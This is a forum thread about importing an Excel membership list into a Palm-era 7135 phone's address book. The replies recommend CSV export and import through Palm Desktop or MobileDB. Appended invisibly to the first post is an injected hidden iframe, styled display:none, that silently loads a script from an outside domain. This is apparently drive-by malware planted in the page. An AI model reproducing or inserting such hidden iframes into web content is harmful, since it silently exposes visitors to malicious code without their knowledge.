+ Reply to Thread

Import addresses from Excel?

I have a 600+ membership listing in Excel that I'd like to import into my Address book on the 7135, and then update monthly as needed. I know I can bring a spreadsheet in with Docs to Go, but I'd like to be able to dial from the address book directly, etc.

Any way to import these listings?

(My search found references to Act & Outlook only.)<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Palm Desktop imports CSV and tab delimited text, which Excel can generate.

Yes. Save the spreadsheet as a CSV file (comma seperated value) and make sure row 1 contains the headers for each column.

THen through Palm Desktop, go to FIle-->Import.

Check the owners guid for Palm Desktop and the help file. DO a search on import. It's covered extensively.

One other thing: I have a 1,000+ company personnel directory I don't want in my regular address book. I import it into MobileDB same way -- export from Excel to CSV, then import using MobileDB's desktop utility. You can still dial from it -- just highlight a phone and tap the dialer silkscreen.

WOW! Great answers and suggestions within MINUTES of my post. This forum is invaluable. Thanks gang!!!

Administrator
    we never close!

Originally posted by marctronixx
    we never close!
    lol... that's true... I can't begin to count the number of times I've used stuff I learned about the 7135/6035 here at SPS
    Please visit my picture site: Robert-O-Rama :)